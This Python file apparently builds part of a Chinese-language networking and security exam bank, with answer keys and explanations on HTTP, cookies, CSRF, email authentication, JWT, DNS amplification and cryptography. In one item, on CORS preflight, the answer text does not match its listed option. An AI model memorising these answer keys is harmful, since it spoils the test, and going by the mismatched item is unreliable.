# -*- coding: utf-8 -*-
"""
Part 5 of Junior Network Bank (資通網路與安全概要題庫擴充 - 第五部分)
主題：應用層協定（HTTP/1/2/3、DNS/郵件）、密碼學PKI與TLS、網路攻擊與次世代資安防禦
題数：72 題高品質全解析
"""

def get_junior_net_part5_questions():
    qs = []

    # 1. 應用層協定、全球資訊網 HTTP 演進與狀態碼 (18 題)
    http_data = [
        ("全球資訊網超文本傳輸協定（HTTP）在版本演進中，HTTP/1.1 相較於早期 HTTP/1.0 所帶來的最核心傳輸優化為？",
         "預設啟用「持久連線（Persistent Connections / Keep-Alive）」，允許多個 HTTP 請求與回應重複複用同一個底層 TCP 連線，並支援管線化（Pipelining）與 Host 虛擬主機標頭",
         ["預設啟用「持久連線（Persistent Connections / Keep-Alive）」，允許多個 HTTP 請求與回應重複複用同一個底層 TCP 連線，並支援管線化（Pipelining）與 Host 虛擬主機標頭",
          "完全拋棄了 TCP 改用藍牙傳輸",
          "將所有網頁文字自動加密為不可讀的亂碼",
          "強制禁止網頁中載入任何圖片或影片"],
         "HTTP/1.1 劃時代突破（RFC 2616）：在 HTTP/1.0 中，每抓取一個 HTML 檔案或圖片都必須重新進行一次「三向交握建立 TCP -> 傳輸資料 -> 四次揮手關閉 TCP」，網頁有 50 張圖就需經歷 50 次沉重的握手延遲。HTTP/1.1 預設 `Connection: keep-alive`，單一 TCP 連線長久保持，後續請求串列複用，大幅降低連線延遲。"),
        ("HTTP/2（RFC 7540）相較於 HTTP/1.1，在底層傳輸架構上實施的革命性重構為？",
         "將純文字協定改為「二進位分幀（Binary Framing）」、引入「多路複用（Multiplexing）」在單一 TCP 連線上完全並行交錯收發多個請求，徹底消滅了 HTTP 應用層的「隊頭阻塞（HOL Blocking）」",
         ["將純文字協定改為「二進位分幀（Binary Framing）」、引入「多路複用（Multiplexing）」在單一 TCP 連線上完全並行交錯收發多個請求，徹底消滅了 HTTP 應用層的「隊頭阻塞（HOL Blocking）」",
          "全面改用 UDP 傳輸",
          "取消了所有 HTTP 狀態碼",
          "只能在手機上使用，電腦無法支援"],
         "HTTP/2 核心創新：<br>1. Binary Framing：將文本拆分為 HEADERS 幀與 DATA 幀，二進位解析無歧義且效率極高。<br>2. 多路複用（Multiplexing）：所有請求與回應被賦予 Stream ID，雙向同時交錯在同一條 TCP 上傳輸，某個大圖片卡住完全不會阻礙其他 CSS/JS 檔案的傳輸。<br>3. HPACK 演算法：大幅壓縮重複傳輸的 HTTP 標頭。<br>4. 伺服器推送（Server Push）。"),
        ("次世代網際網路協定 HTTP/3 拋棄了傳統的 TCP 傳輸層，改為基於 UDP 之上構建的何種新一代傳輸協定？其解決的核心痛點為？",
         "基於「QUIC 協定」；徹底消滅了因 TCP 封包遺失重傳而導致整條連線上所有無關資料流全部停擺的「傳輸層隊頭阻塞（TCP HOL Blocking）」，並實現 0-RTT 連線快速握手與連線遷移",
         ["基於「QUIC 協定」；徹底消滅了因 TCP 封包遺失重傳而導致整條連線上所有無關資料流全部停擺的「傳輸層隊頭阻塞（TCP HOL Blocking）」，並實現 0-RTT 連線快速握手與連線遷移",
          "基於 ICMP 協定；讓網頁載入速度達到光速的兩倍",
          "基於 ARP 協定；徹底消滅了密碼竊聽",
          "基於 RIP 協定；自動計算網頁伺服器的地理位置"],
         "HTTP/3 與 QUIC（RFC 9000）：在 HTTP/2 中，雖然應用層多路複用，但底層仍走單一 TCP 連線。一旦底層發生單一封包丟包，TCP 的保證順序機制會將整個連線凍結（等待重傳），所有 Stream 全部被卡死（TCP HOL）。QUIC 移師 UDP，在用戶態實作多條獨立的 Packet 重傳通道，Stream 之間互不干擾；且連線以 Connection ID 識別，手機由 4G 切換至 Wi-Fi 時 IP 改變連線完全不中斷（連線遷移 Connection Migration）！"),
        ("HTTP 狀態碼（Status Codes）的三位數字編碼中，以 2xx、3xx、4xx 與 5xx 開頭的類別含義分別為？",
         "2xx 代表請求成功、3xx 代表重新導向、4xx 代表客戶端錯誤、5xx 代表伺服器端錯誤",
         ["2xx 代表請求成功、3xx 代表重新導向、4xx 代表客戶端錯誤、5xx 代表伺服器端錯誤",
          "2xx 代表重新開機、3xx 代表檔案刪除、4xx 代表網路斷線、5xx 代表硬碟故障",
          "2xx 代表伺服器錯誤、3xx 代表客戶端錯誤、4xx 代表重新導向、5xx 代表成功",
          "四個類別皆代表不同的加密演算法"],
         "HTTP 狀態碼大類劃分：<br>‧ 1xx: 資訊性狀態（如 101 Switching Protocols 升級為 WebSocket）。<br>‧ 2xx: 成功（如 200 OK, 204 No Content, 206 Partial Content 分段下載）。<br>‧ 3xx: 重新導向（如 301 永久移動, 302 暫時移動, 304 快取未修改）。<br>‧ 4xx: 客戶端出錯（如 400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found）。<br>‧ 5xx: 伺服器端故障（如 500 Internal Server Error, 502 Bad Gateway, 503 Service Unavailable, 504 Gateway Timeout）。"),
        ("HTTP 重新導向狀態碼中，「301 Moved Permanently」與「302 Found / 307 Temporary Redirect」的本質區別為？",
         "301 為「永久性重新導向」，瀏覽器與搜尋引擎（SEO）會長期快取該新網址並將搜尋權重轉移；302 / 307 為「暫時性重新導向」，客戶端未來仍應存取原始 URL",
         ["301 為「永久性重新導向」，瀏覽器與搜尋引擎（SEO）會長期快取該新網址並將搜尋權重轉移；302 / 307 為「暫時性重新導向」，客戶端未來仍應存取原始 URL",
          "301 只能在手機上使用，302 只能在電腦上使用",
          "301 會刪除網頁內容，302 會複製網頁內容",
          "兩者在瀏覽器與搜尋引擎處理上完全無任何差異"],
         "SEO 與架構實務：當網站全面由 HTTP 升級遷移為 HTTPS，或永久更換新網域名稱時，必須回傳 301 狀態碼，通知 Google 等搜尋引擎爬蟲將歷史權重（PageRank）無損繼承至新網址，且瀏覽器會將 301 結果硬性本機快取；若只是促銷活動或登入跳轉，則使用 302/307 暫時導流。"),
        ("當客戶端發起 HTTP 請求時，若伺服器回傳狀態碼「304 Not Modified」，代表的核心傳輸意義為？",
         "客戶端本地快取的資源依然新鮮有效，伺服器「不傳送任何訊息主體（Payload Body 為空）」，客戶端直接使用本機快取渲染網頁，大幅節省頻寬與載入時間",
         ["客戶端本地快取的資源依然新鮮有效，伺服器「不傳送任何訊息主體（Payload Body 為空）」，客戶端直接使用本機快取渲染網頁，大幅節省頻寬與載入時間",
          "伺服器找不到該檔案已被刪除",
          "使用者的密碼過期已被鎖定",
          "網路線路斷線無法傳輸資料"],
         "協商快取（Conditional Request）：客戶端帶上 `If-None-Match: \"xyz\"`（ETag）或 `If-Modified-Since` 標頭詢問伺服器。若資源在伺服器端完全未曾修改，伺服器直接回送簡短的 304 標頭（不到 1 KB），不帶任何 HTML/圖片內容，瀏覽器秒級自磁碟快取載入，速度極致流暢。"),
        ("HTTP 客戶端錯誤狀態碼中，「401 Unauthorized」與「403 Forbidden」的權限語意區別為？",
         "401 代表「尚未通過身分認證（未登入或憑證無效）」，要求客戶端提供登入身分證明；403 代表「伺服器理解請求但明確拒絕執行（身分已知但無足夠存取權限，即使重新登入亦無效）」",
         ["401 代表「尚未通過身分認證（未登入或憑證無效）」，要求客戶端提供登入身分證明；403 代表「伺服器理解請求但明確拒絕執行（身分已知但無足夠存取權限，即使重新登入亦無效）」",
          "401 代表伺服器過熱，403 代表伺服器關機",
          "401 只能由管理員看到，403 所有人都能看到",
          "兩者語意完全相同僅代碼不同"],
         "資安鑑別：<br>‧ 401（Authentication Required）：使用者尚未表明自己是誰，瀏覽器會彈出登入框或引導跳轉至 SSO 登入頁。<br>‧ 403（Authorization Failed）：使用者已經登入（例如一般基層員工帳號），但嘗試存取只有董事長或管理員才能看的高機密薪資報表，伺服器冷冷拒絕「權限不足，禁止通行」。"),
        ("在反向代理（Reverse Proxy，如 Nginx）架構中，當後端應用伺服器（Upstream，如 Tomcat/Node.js）崩潰宕機或網路中斷無法連線時，反向代理回傳給使用者的 HTTP 狀態碼通常為？",
         "502 Bad Gateway（無效閘道）",
         ["502 Bad Gateway（無效閘道）",
          "404 Not Found",
          "200 OK",
          "504 Gateway Timeout"],
         "502 vs 504 運維排錯核心：<br>‧ 502 Bad Gateway：Nginx 作為網關代理，嘗試連線後端應用（如 127.0.0.1:8080），但後端進程根本沒開或已經 crash 崩潰（TCP 連線立刻被拒 Connection Refused），網關收到無效回應。<br>‧ 504 Gateway Timeout：後端伺服器活著且建立了 TCP 連線，但後端執行了一條超長 SQL 慢查詢（死鎖），超過了 Nginx 設定的逾時時間（如 60 秒），網關等待超時回報 504。"),
        ("HTTP 請求方法中，關於「安全性（Safe）」與「冪等性（Idempotent）」的定義與對應方法，何者完全正確？",
         "GET 方法具備安全與冪等性（純讀取不修改伺服器資源）；PUT 與 DELETE 方法具備「冪等性（連續執行多次與執行一次產生的伺服器狀態完全相同）」但不具備安全性；POST 方法既非安全亦非冪等",
         ["GET 方法具備安全與冪等性（純讀取不修改伺服器資源）；PUT 與 DELETE 方法具備「冪等性（連續執行多次與執行一次產生的伺服器狀態完全相同）」但不具備安全性；POST 方法既非安全亦非冪等",
          "POST 方法是絕對安全的，可以任意執行",
          "所有 HTTP 方法皆具備冪等性",
          "DELETE 方法具備安全性，不會刪除任何資料"],
         "RESTful API 設計基石：<br>1. 安全（Safe）：不改變伺服器資源狀態（GET, HEAD, OPTIONS）。<br>2. 冪等（Idempotent）：執行 f(f(x)) = f(x)。例如 `DELETE /user/10` 執行 1 次或 10 次，該用戶狀態皆為已刪除；`PUT /user/10` 將姓名改為 Bob，執行 10 次姓名依然是 Bob。<br>3. 非冪等：`POST /order/create` 執行 10 次會產生 10 筆新訂單（重複扣款災難！）。"),
        ("Web 快取控制標頭 `Cache-Control` 中，「no-cache」與「no-store」的指令語意本質差異為？",
         "「no-cache」允許客戶端快取資源，但在每次使用快取前「必須先向伺服器發起協商確認（ETag/304 驗證）」；「no-store」則「絕對禁止任何快取（每次必須完整自伺服器重新下載）」",
         ["「no-cache」允許客戶端快取資源，但在每次使用快取前「必須先向伺服器發起協商確認（ETag/304 驗證）」；「no-store」則「絕對禁止任何快取（每次必須完整自伺服器重新下載）」",
          "no-cache 速度快，no-store 速度慢",
          "no-cache 只能在硬碟快取，no-store 只能在記憶體快取",
          "兩者語意 100% 完全相同"],
         "前端快取避坑常考點：很多人誤以為 no-cache 是不存快取，大錯特錯！<br>‧ `no-cache`：等同 `max-age=0, must-revalidate`。瀏覽器可以把檔案存進硬碟，但每次要用之前必須發請求問伺服器「這檔案改過沒？」。若沒改（304）就用本機快取。<br>‧ `no-store`：才是真正的「機密禁止落地」！用於銀行帳單或個人私密照片，瀏覽器與代理伺服器絕不准保留任何字節在磁碟或暫存中。"),
        ("在瀏覽器 Cookie 安全設定中，設置「HttpOnly」屬性最主要抵禦的網路攻擊手法為？",
         "跨站腳本攻擊（XSS），防止惡意 JavaScript 腳本透過 `document.cookie` 讀取使用者的 Session ID 等敏感認證資訊",
         ["跨站腳本攻擊（XSS），防止惡意 JavaScript 腳本透過 `document.cookie` 讀取使用者的 Session ID 等敏感認證資訊",
          "跨站請求偽造攻擊（CSRF）",
          "SQL 資料隱碼攻擊（SQL Injection）",
          "分散式阻斷服務攻擊（DDoS）"],
         "Cookie 資安三大防護標記：<br>1. `HttpOnly`：禁止前端 JS 存取此 Cookie。即使網站有 XSS 漏洞被駭客注入惡意腳本，駭客的 JS 也讀不到 Session Token，防止身分被秒盜。<br>2. `Secure`：限制此 Cookie 僅能經由加密的 HTTPS 傳輸，明文 HTTP 絕不發送。<br>3. `SameSite=Strict/Lax`：限制跨站請求時攜帶 Cookie，根治 CSRF 攻擊。"),
        ("跨來源資源共享（<span class=\"en\">CORS, Cross-Origin Resource Sharing</span>）在瀏覽器實施同源政策（Same-Origin Policy）下，當發起非簡單請求時，瀏覽器會自動先發送何種預檢請求？",
         "採用 OPTIONS 方法發送「預檢請求（Preflight Request）」，向伺服器探詢是否允許該跨網域請求與自定義標頭",
         ["採用 OPTIONS 方法發送「預檢請求（Preflight Request）」，向伺服器探詢是否簡單請求與自定義標頭",
          "採用 GET 方法發送預先測試請求",
          "採用 POST 方法發送空請求",
          "直接彈出警報視窗並阻斷連線"],
         "CORS 預檢流程：若請求帶有自定義標頭（如 `Authorization: Bearer ...`）或為 JSON POST/PUT/DELETE，瀏覽器自動向目標 URL 發送 `OPTIONS` 請求，帶上 `Origin` 與 `Access-Control-Request-Method`。伺服器若回傳 `Access-Control-Allow-Origin: *`（或匹配的網域），瀏覽器才正式發出真正的商業邏輯請求，否則在前端觸發 CORS 跨域錯誤。"),
        ("電子郵件協定體系中，用於「發送/傳遞」郵件的協定，與用於「接收/讀取」郵件的協定分別為？",
         "發送郵件採用 SMTP（簡單郵件傳輸協定）；接收讀取郵件採用 POP3 或 IMAP 協定",
         ["發送郵件採用 SMTP（簡單郵件傳輸協定）；接收讀取郵件採用 POP3 或 IMAP 協定",
          "發送郵件採用 POP3；接收郵件採用 SMTP",
          "發送與接收郵件皆採用 HTTP 協定",
          "發送採用 FTP；接收採用 DNS"],
         "電子郵件協定分工：<br>1. SMTP（Simple Mail Transfer Protocol，TCP 25/587）：用戶端將郵件送至發信伺服器，以及不同網域的郵件伺服器之間互傳郵件（Push 協定）。<br>2. POP3（TCP 110/995）：單向將伺服器信件下載至本地，預設下載後伺服器端刪除（離線單機模式）。<br>3. IMAP（TCP 143/993）：雙向同步協定，信件保留在伺服器端，手機、電腦與網頁端狀態（已讀、資料夾）隨時保持一致。"),
        ("電子郵件安全防護中，為防範釣魚郵件偽造發信人網域名稱（Spoofing），業界普遍要求在 DNS 中部署的三大驗證記錄為？",
         "SPF（發送者策略架構）、DKIM（網域金鑰識別郵件）與 DMARC（網域型郵件驗證報告與一致性）",
         ["SPF（發送者策略架構）、DKIM（網域金鑰識別郵件）與 DMARC（網域型郵件驗證報告與一致性）",
          "TCP、UDP 與 ICMP 記錄",
          "MD5、SHA-1 與 CRC-32 記錄",
          "HTML、CSS 與 JavaScript 記錄"],
         "郵件防偽鐵三角：<br>1. SPF（TXT 記錄）：宣告「只有清單中的特定伺服器 IP 有資格代表本網域發信」。<br>2. DKIM（公鑰簽名）：發信伺服器以私鑰對郵件標頭簽章，收信端自 DNS 撈取 DKIM 公鑰校驗，保證內容未被竄改。<br>3. DMARC（策略統一）：規定當 SPF 或 DKIM 驗證失敗時，收信端應直接拒收（Reject）還是丟入垃圾郵件桶（Quarantine），並每日寄送報警報告。"),
        ("JSON Web Token（<span class=\"en\">JWT</span>）作為現代無狀態分散式身分驗證標準，其字串由三個以小數點「.」分隔的部分組成，依序為？",
         "標頭（Header） . 酬載（Payload） . 簽章（Signature）",
         ["標頭（Header） . 酬載（Payload） . 簽章（Signature）",
          "使用者名稱 . 密碼 . 伺服器IP",
          "加密金鑰 . 資料 . 校驗和",
          "網域名稱 . 埠號 . 路徑"],
         "JWT 結構分析：`header.payload.signature`<br>1. Header（Base64URL 編碼）：聲明令牌類型（JWT）與簽章演算法（如 HS256 或 RS256）。<br>2. Payload（Base64URL 編碼）：攜帶聲明（Claims，如用戶 ID、角色、過期時間 exp）。注意：Payload 是未加密的明文，絕不准放入機密密碼！<br>3. Signature：由伺服器以私鑰或密鑰對 `Base64(Header) + \".\" + Base64(Payload)` 計算數位簽章，任何篡改 Payload 的行為都會導致簽章驗證失敗。"),
        ("在單一登入（<span class=\"en\">SSO</span>）與跨系統授權架構中，OAuth 2.0 與 OpenID Connect（OIDC）的職責分工為？",
         "OAuth 2.0 專門負責「授權（Authorization，頒發存取令牌 Access Token 控制資源存取）」；OpenID Connect 構建於 OAuth 2.0 之上，專門負責「身分認證（Authentication，頒發身分令牌 ID Token 確認使用者是誰）」",
         ["OAuth 2.0 專門負責「授權（Authorization，頒發存取令牌 Access Token 控制資源存取）」；OpenID Connect 構建於 OAuth 2.0 之上，專門負責「身分認證（Authentication，頒發身分令牌 ID Token 確認使用者是誰）」",
          "OAuth 2.0 負責認證，OIDC 負責授權",
          "兩者皆是資料庫查詢語言",
          "OAuth 2.0 只能在微軟 Windows 上使用"],
         "授權 vs 認證：<br>‧ OAuth 2.0：例如授權某相簿 App 存取你在 Google Drive 上的照片（App 拿到 Access Token 去開門），但 App 不知道你是誰。<br>‧ OIDC（OpenID Connect）：在 OAuth 流程中增加一個 JWT 格式的 `id_token`，讓第三方網站能夠安全獲知使用者的個人檔案（Profile，實現「使用 Google / Apple 帳號一鍵登入」）。"),
        ("Web 應用程式防範「跨站請求偽造（<span class=\"en\">CSRF</span>）」攻擊，最標準有效的架構防禦策略為？",
         "採用同步防禦權杖（CSRF Token，表單提交時強制攜帶並由後端校驗一次性隨機 Token）與將敏感 Cookie 設定 `SameSite=Lax` 或 `Strict` 屬性",
         ["採用同步防禦權杖（CSRF Token，表單提交時強制攜帶並由後端校驗一次性隨機 Token）與將敏感 Cookie 設定 `SameSite=Lax` 或 `Strict` 屬性",
          "將資料庫的密碼清空",
          "全面改用 GET 方法提交表單",
          "要求使用者每隔 10 秒更換一次密碼"],
         "CSRF 攻擊機制與根治：<br>1. 攻擊手法：受害者在 A 銀行登入中，不小心點擊駭客惡意網站 B。網站 B 自動向 A 銀行發送轉帳請求。瀏覽器會「自動盲目帶上 A 銀行的 Cookie」，導致受害者在不知不覺中轉帳成功。<br>2. CSRF Token 防禦：Token 存放在前端 DOM 中由 JS 讀取，駭客跨站發送請求時無法偽造出此專屬 Token（因同源政策無法讀取 DOM），後端比對不到 Token 立刻拒絕。"),
        ("動態主機設定中，DNS 放大攻擊（<span class=\"en\">DNS Amplification Attack</span>）屬於何種類型的資安攻擊？其達成倍數放大的核心機制為？",
         "分散式阻斷服務攻擊（DDoS）；攻擊者偽造「來源 IP 為受害者 IP」向開放的公共 DNS 解析器發送極短的 ANY 查詢請求，伺服器回覆巨量數十倍體積的回應封包灌爆受害者頻寬",
         ["分散式阻斷服務攻擊（DDoS）；攻擊者偽造「來源 IP 為受害者 IP」向開放的公共 DNS 解析器發送極短的 ANY 查詢請求，伺服器回覆巨量數十倍體積的回應封包灌爆受害者頻寬",
          "利用惡意程式破壞使用者的顯示器硬體",
          "竊取使用者的網銀帳號密碼",
          "將全世界所有的 DNS 伺服器強制關機"],
         "UDP 反射放大攻擊原理：因為 UDP 無連線且不驗證來源 IP（極易被偽造欺騙）。攻擊者發送 50 Bytes 的 EDNS0 ANY 查詢請求，偽造來源為受害公司 IP。DNS 伺服器回傳包含 DNSSEC 數位簽章的高達 3000~4000 Bytes 龐大回應（放大倍率高達 60~80 倍）。攻擊者透過少數殭屍電腦即可在受害者端掀起數十 Gbps 的流量海嘯。")
    ]

    # 2. 密碼學基礎、對稱/非對稱加密與 PKI/數位簽章 (18 題)
    crypto_data = [
        ("資訊安全領域公認的「CIA 三要素（CIA Triad）」核心目標，是指哪三項安全屬性？",
         "機密性（Confidentiality）、完整性（Integrity）與可用性（Availability）",
         ["機密性（Confidentiality）、完整性（Integrity）與可用性（Availability）",
          "控制性（Control）、隔離性（Isolation）與授權性（Authorization）",
          "電腦性（Computer）、網際網路性（Internet）與應用性（Application）",
          "通訊性（Communication）、情報性（Intelligence）與防護性（Armor）"],
         "CIA 三要素本質：<br>1. 機密性（Confidentiality）：確保敏感資訊僅允許授權實體存取，防止未經授權的洩漏或竊聽（透過加密技術實現）。<br>2. 完整性（Integrity）：確保資料在傳輸與儲存中未遭未經授權的竄改、偽造或刪除（透過雜湊校驗與數位簽章實現）。<br>3. 可用性（Availability）：確保授權使用者在需要時隨時能正常存取系統與資料（防範 DDoS 攻擊與單點故障）。"),
        ("對稱金鑰加密（<span class=\"en\">Symmetric Encryption</span>）與非對稱金鑰加密（<span class=\"en\">Asymmetric Encryption</span>）在密鑰管理與運算效能上的核心對比何者完全正確？",
         "對稱加密加密與解密使用「同一把密鑰」，運算速度極快、適合巨量資料傳輸，但密鑰安全分發極為困難；非對稱加密使用「公鑰與私鑰配對」，密鑰管理容易，但運算複雜度高、加解密速度緩慢",
         ["對稱加密加密與解密使用「同一把密鑰」，運算速度極快、適合巨量資料傳輸，但密鑰安全分發極為困難；非對稱加密使用「公鑰與私鑰配對」，密鑰管理容易，但運算複雜度高、加解密速度緩慢",
          "對稱加密運算速度比非對稱加密慢一千倍",
          "非對稱加密只能在單核心電腦上運作",
          "對稱加密使用兩把不同的密鑰，非對稱使用同一把密鑰"],
         "密碼學黃金搭配：對稱加密（如 AES）比非對稱加密（如 RSA）快數百到上千倍。實務通訊（如 HTTPS TLS）從不直接用非對稱加密傳輸整個網頁或影片；而是採用混合加密架構（Hybrid Cryptosystem）：在交握初期利用非對稱加密安全協商出一把臨時的「對稱會話金鑰（Session Key）」，後續的所有海量資料傳輸全數交由對稱加密高速處理。"),
        ("進階加密標準（<span class=\"en\">AES, Advanced Encryption Standard</span>）在現代資安標準中的區塊長度與金鑰長度規範為？",
         "固定區塊長度（Block Size）為 128 位元；支援三種標準金鑰長度：128 位元、192 位元與 256 位元",
         ["固定區塊長度（Block Size）為 128 位元；支援三種標準金鑰長度：128 位元、192 位元與 256 位元",
          "區塊長度為 64 位元；金鑰長度固定為 56 位元",
          "區塊長度為 256 位元；金鑰長度固定為 1024 位元",
          "區塊與金鑰長度皆只能固定為 512 位元"],
         "AES（Rijndael）標準規範：NIST 於 2001 年取代老舊脆弱的 DES。<br>‧ 區塊大小永遠為 128 bits（16 Bytes）。<br>‧ AES-128: 10 輪反覆加密。<br>‧ AES-192: 12 輪加密。<br>‧ AES-256: 14 輪加密（美國政府最高機密級別 CNSA 標準）。現代 Intel/AMD/ARM CPU 皆具備硬體級 AES-NI 專屬指令集加速，加解密吞吐量高達數十 Gbps。"),
        ("區塊加密工作模式中，「電子密碼書模式（<span class=\"en\">ECB, Electronic Codebook</span>）」在現代資安中被嚴格禁用的致命弱點為？",
         "相同的明文區塊永遠會被加密為「完全相同的密文區塊」，無法隱藏明文的統計模式與幾何結構特徵（如經典的 ECB 企鵝圖形輪廓外洩）",
         ["相同的明文區塊永遠會被加密為「完全相同的密文區塊」，無法隱藏明文的統計模式與幾何結構特徵（如經典的 ECB 企鵝圖形輪廓外洩）",
          "ECB 模式加解密運算速度過慢",
          "ECB 模式只能加密純英文，無法加密中文字元",
          "ECB 模式會自動將密鑰發送至網際網路"],
         "ECB 致命圖形缺陷：若明文中有大面積相同的顏色或空白資料（如點陣圖的背景全白區塊），每個 16B 的全白區塊被獨立加密成相同的密文區塊，密文拼起來依然清晰可見企鵝的完整輪廓！安全模式（如 CBC 密碼區塊鏈接模式）引入隨機初始向量（IV）與前一塊密文 XOR，徹底消滅模式殘留；現代主流則全面升級為具備內建認證的 GCM（伽羅瓦/計數器模式）。"),
        ("非對稱加密演算法 RSA 的數學安全性基石為？",
         "大整數質因數分解問題（Integer Factorization Problem）的計算複雜度（將兩個超大質數相乘極其容易，但將其乘積分解還原出原始質數在古典電腦上計算時間長達天文數字）",
         ["大整數質因數分解問題（Integer Factorization Problem）的計算複雜度（將兩個超大質數相乘極其容易，但將其乘積分解還原出原始質數在古典電腦上計算時間長達天文數字）",
          "微積分偏微分方程的無解性",
          "矩陣乘法運算的不連續性",
          "光速傳播的不確定性原理"],
         "Rivest, Shamir, Adleman 於 1977 年提出的 RSA 數學原理：選取兩超大質數 p 和 q，計算 n = p × q 與歐拉函數 φ(n) = (p-1)(q-1)。公鑰為 (e, n)，私鑰 d 滿足 e × d ≡ 1 (mod φ(n))。若想從公鑰 (e, n) 反算出私鑰 d，必須先將 n 分解為 p 和 q。當 n 達到 2048 位元或 4096 位元時，全世界所有超算聯合暴力分解需耗費數百萬年。但在量子電腦秀爾演算法（Shor's Algorithm）面前理論上可在多項式時間內被瓦解。"),
        ("橢圓曲線密碼學（<span class=\"en\">ECC, Elliptic Curve Cryptography</span>）相較於傳統 RSA，在現代行動裝置與高安全環境中最顯著的優勢為？",
         "基於橢圓曲線離散對數問題（ECDLP）；在達到相同安全強度時「所需金鑰長度極短（例如 256 位元的 ECC 即可達到等同 RSA 3072 位元的頂級安全強度）」，運算資源消耗極低且儲存開銷微小",
         ["基於橢圓曲線離散對數問題（ECDLP）；在達到相同安全強度時「所需金鑰長度極短（例如 256 位元的 ECC 即可達到等同 RSA 3072 位元的頂級安全強度）」，運算資源消耗極低且儲存開銷微小",
          "ECC 只能在微軟 Windows 系統上運行",
          "ECC 完全不需要任何數學運算",
          "ECC 的加解密速度比 RSA 慢十倍"],
         "ECC 巨大優勢：RSA 金鑰長度隨安全要求提高而爆炸性增長（2048 -> 4096 bits），金鑰交換運算極其吃重；而 ECC（如 Curve25519, NIST P-256）只需極短的 256 位元金鑰，便能碾壓 RSA 2048 位元。在智慧手錶、IoT 晶片與 TLS 1.3 握手中全面成為主流標準（ECDSA / ECDH）。"),
        ("迪菲-赫爾曼金鑰交換（<span class=\"en\">Diffie-Hellman Key Exchange, DH</span>）演算法的重大突破為？",
         "允許通訊雙方在「完全不安全的公開通道上（即使有竊聽者全程監聽）」，透過公開交換部分參數安全協商出一個僅有雙方知曉的「共享秘密對稱金鑰（Shared Secret）」",
         ["允許通訊雙方在「完全不安全的公開通道上（即使有竊聽者全程監聽）」，透過公開交換部分參數安全協商出一個僅有雙方知曉的「共享秘密對稱金鑰（Shared Secret）」",
          "將資料直接透過實體金屬保險箱運送",
          "完全不需要任何數學計算即可傳送密碼",
          "只能在通訊雙方見面握手時生效"],
         "DH 演算法魔術本質（基於離散對數難題）：雙方協商大質數 p 與原根 g。<br>1. Alice 選私密隨機數 a，發送 A = g^a mod p。<br>2. Bob 選私密隨機數 b，發送 B = g^b mod p。<br>3. 竊聽者監聽到 p, g, A, B，但因離散對數太難，算不出 a 和 b。<br>4. Alice 計算 K = B^a mod p = g^(ab) mod p；Bob 計算 K = A^b mod p = g^(ab) mod p。雙方在不安全通道上奇蹟般計算出相同的 K 作為對稱金鑰！缺點：原生 DH 無身分認證，易遭中間人攻擊（需搭配數位簽章）。"),
        ("前向保密（<span class=\"en\">PFS, Perfect Forward Secrecy</span>）在現代安全傳輸（如 TLS 1.3）中的關鍵安全保證為？",
         "每次會話皆使用臨時生成的一次性密鑰交換（如 ECDHE）；即使未來伺服器的長效私鑰不幸遭駭客竊取外洩，駭客「依然無法解密過去歷史上所側錄儲存的任何密文通訊流量」",
         ["每次會話皆使用臨時生成的一次性密鑰交換（如 ECDHE）；即使未來伺服器的長效私鑰不幸遭駭客竊取外洩，駭客「依然無法解密過去歷史上所側錄儲存的任何密文通訊流量」",
          "保證資料在未來的傳輸速度永遠不會變慢",
          "保證密碼永遠不需要更新",
          "防止電腦硬體硬碟物理老化"],
         "PFS 終結歷史洩密危機：在傳統靜態 RSA 握手中，客戶端用伺服器長效公鑰加密預主密鑰（Pre-Master Secret）。若情報機構或駭客將幾年內該伺服器的所有加密流量錄下來存進硬碟；五年後若伺服器被攻破取得私鑰，五年內的所有歷史通訊全被一鍵批量解密！TLS 1.3 徹底廢黜靜態 RSA 密鑰交換，強制全面採用臨時 (EC)DHE，通訊結束臨時金鑰立刻自 RAM 銷毀，歷史流量永久不可逆安全。"),
        ("密碼學安全雜湊函式（<span class=\"en\">Cryptographic Hash Function</span>，如 SHA-256）必須嚴格滿足的三大數學特性為？",
         "單向性（Pre-image Resistance，抗原像性）、弱抗碰撞性（Second Pre-image Resistance，抗次原像性）與強抗碰撞性（Collision Resistance）",
         ["單向性（Pre-image Resistance，抗原像性）、弱抗碰撞性（Second Pre-image Resistance，抗次原像性）與強抗碰撞性（Collision Resistance）",
          "可逆性、重複性與對稱性",
          "快速性、開源性與免費性",
          "加密性、壓縮性與擴展性"],
         "雜湊三大防線：<br>1. 單向性（One-way）：給定 H，計算出原始 x 使得 hash(x)=H 在計算上不可行。<br>2. 弱抗碰撞性：給定特定 x，想找出另一個 y ≠ x 且 hash(x)=hash(y) 極難。<br>3. 強抗碰撞性：想隨意找出「任意兩個不同的資料 x 和 y」滿足 hash(x)=hash(y) 極難（生日攻擊防禦）。MD5 與 SHA-1 因強抗碰撞性被打破（可在合理時間內構造碰撞）而被全面淘汰，現代全面遷移至 SHA-256 / SHA-3。"),
        ("訊息鑑別碼（<span class=\"en\">HMAC, Hash-based Message Authentication Code</span>）的結構與主要功能為？",
         "將原始訊息與通訊雙方共享的「秘密金鑰（Secret Key）」結合後進行雜湊運算；用於同時保證資料傳輸的「完整性（Integrity）」與「來源真實性認證（Authenticity）」",
         ["將原始訊息與通訊雙方共享的「秘密金鑰（Secret Key）」結合後進行雜湊運算；用於同時保證資料傳輸的「完整性（Integrity）」與「來源真實性認證（Authenticity）」",
          "專門用於壓縮大檔案以節省硬碟空間",
          "將密文轉換為明文的解密工具",
          "用來計算網路封包的傳播速度"],
         "HMAC 設計哲學（RFC 2104）：純雜湊（如 SHA-256）只能防範傳輸中的無意位元翻轉。若中間人惡意篡改了資料，中間人可以順手重新計算一份新的 SHA-256 填入！HMAC 引入共享秘密金鑰 K：公式 `HMAC(K, m) = Hash((K ⊕ opad) || Hash((K ⊕ ipad) || m))`。攻擊者沒有密鑰 K，篡改訊息後絕對算不出正確的 HMAC，成功粉碎偽造。"),
        ("數位簽章（<span class=\"en\">Digital Signature</span>）在底層運作時的標準流程為？",
         "發送端將訊息經由雜湊函式計算出摘要，以「發送端自身的私鑰（Private Key）」對摘要進行加密生成簽名；接收端以「發送端的公鑰（Public Key）」解密簽名還原摘要並比對驗證",
         ["發送端將訊息經由雜湊函式計算出摘要，以「發送端自身的私鑰（Private Key）」對摘要進行加密生成簽名；接收端以「發送端的公鑰（Public Key）」解密簽名還原摘要並比對驗證",
          "發送端以接收端的公鑰加密整個檔案，接收端以私鑰解密",
          "使用發送端的手寫筆跡在螢幕上簽名",
          "將檔案的檔案名稱修改為發送端的真實姓名"],
